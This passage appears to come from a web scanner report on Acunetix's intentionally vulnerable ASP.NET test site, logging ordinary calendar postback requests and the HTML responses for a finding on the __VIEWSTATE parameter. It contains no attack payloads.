href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8158&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDA2N2XLNoIZGRkw4pC9cUYGMhdgb5Evxkqoj9fjjs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B3cGIAgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPY8L%2B1n3eQMr%2FS01UW5AzumCB68s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:51 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDA2N2XLNoIZGRkw4pC9cUYGMhdgb5Evxkqoj9fjjs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+3cGIAgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPY8L+1n3eQMr/S01UW5AzumCB68s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:White" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8162&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAf4e8L9oIZGRkLUUjlU2nMY9w8TeE20klx8uIaos%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLBvf22DwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP2cuD3ccWpxs90gaNbfkdnsmKnU8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:29 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAf4e8L9oIZGRkLUUjlU2nMY9w8TeE20klx8uIaos=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLBvf22DwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP2cuD3ccWpxs90gaNbfkdnsmKnU8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:White" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 